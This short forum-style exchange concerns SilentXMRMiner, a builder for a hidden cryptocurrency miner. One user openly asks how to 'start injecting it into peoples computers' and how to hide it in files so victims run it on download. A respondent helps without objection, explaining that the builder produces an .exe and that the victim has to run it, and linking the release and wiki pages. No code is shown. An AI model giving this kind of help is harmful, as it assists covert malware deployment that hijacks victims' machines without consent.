How do I actually run it and start injecting it into peoples computers? What file do I open. Please respond someone :)

Use the builder to build the miner, after that you will get an .exe that you can use to mine.

Additionally, am I able to hide it in files so when the user downloads it, it begins to run? How exactly. Thanks so much for help

Download the builder from here https://github.com/UnamSanctam/SilentXMRMiner/releases and open it, you can read more about all the options here: https://github.com/UnamSanctam/SilentXMRMiner/wiki.

When the person downloads it they will have to execute it (run it by double-click or any other method) like any other program. You can't make things run automatically when downloaded (of course) since that would be a huge security flaw.
